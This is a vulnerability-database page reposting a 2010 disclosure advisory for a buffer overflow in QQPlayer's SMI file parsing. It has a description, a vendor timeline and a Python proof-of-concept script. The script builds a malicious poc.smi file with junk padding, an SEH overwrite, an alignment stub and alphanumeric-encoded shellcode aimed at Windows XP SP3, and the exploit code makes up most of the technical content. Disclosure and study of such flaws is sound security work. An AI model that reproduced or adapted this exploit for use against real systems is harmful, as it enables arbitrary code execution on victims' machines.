Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24352
HistoryJul 29, 2010 - 12:00 a.m.

QQplayer smi File Processing Buffer Overflow Vulnerability

2010-07-2900:00:00
vulners.com
11
JSON

QQplayer smi File Processing Buffer Overflow Vulnerability

By Lufeng Li of Neusoft Corporation

Vulnerable: QQPlayer<=2.3.696.400p1

Vendor: Tencent Inc

1) Software Description:
QQPlayer is developed by Tencent Inc.It is very popular universal multimedia player in China.

2) Details:
A buffer overflow vulnerability in QQplayer that Processing smi file. allows remote attackers to execute arbitrary code via a long string in an smi file.

3) Timeline:
2010.05.26 Vendor notified
2010.06.8 Vendor released new fixed versions(QQplayer 2.4.716.400p1)
2010.07.26 Advisory released

4) Exploit:
#!/usr/bin/env python

#################################################################

Title: QQPlayer smi File Buffer Overflow Exploit

Author: Lufeng Li of Neusoft Corporation

Vendor: www.qq.com

Platform: Windows XPSP3 Chinese Simplified

Tested: QQPlayer 2.3.696.400p1

Vulnerable: QQPlayer<=2.3.696.400p1

#################################################################

Code :

head ='''<smil>
<head>
<meta name="title" content="_"/>
<meta name="author" content="Warner Music Group'''

junk = "A" * 2001
nseh ="\x42\x61\x21\x61"
seh ="\x39\x0c\x41\x00"
adjust="\x30\x83\xc0\x0b"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''"/>
</head>
<body>
<seq>
<video src="rtsp://sos2208-1-rm.edgestreams.net/listeningparties/424444/.uid.MSAaAQCGwp9yU7mAOw6d182868f6d3c28b7f158b74fef576e1.424444_specialops.rm?

auth=caEdAc4dqaVcqbHcobOcGaVdaaOdXarcBat-bl.oeA-eS-HEGqpvyyvzDzssup&aifp=0001" title="_" author="Warner Music Group" copyright="2007 Rhino Entertainment"

fill="freeze"/>
</seq>
</body>
</smil>
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c –>'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open("poc.smi","w")
fobj.write(payload)
fobj.close()

Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s)
is intended only for the use of the intended recipient and may be confidential and/or privileged of
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is
not the intended recipient, unauthorized use, forwarding, printing, storing, disclosure or copying
is strictly prohibited, and may be unlawful.If you have received this communication in error,please
immediately notify the sender by return e-mail, and delete the original message and all copies from
your system. Thank you.

JSON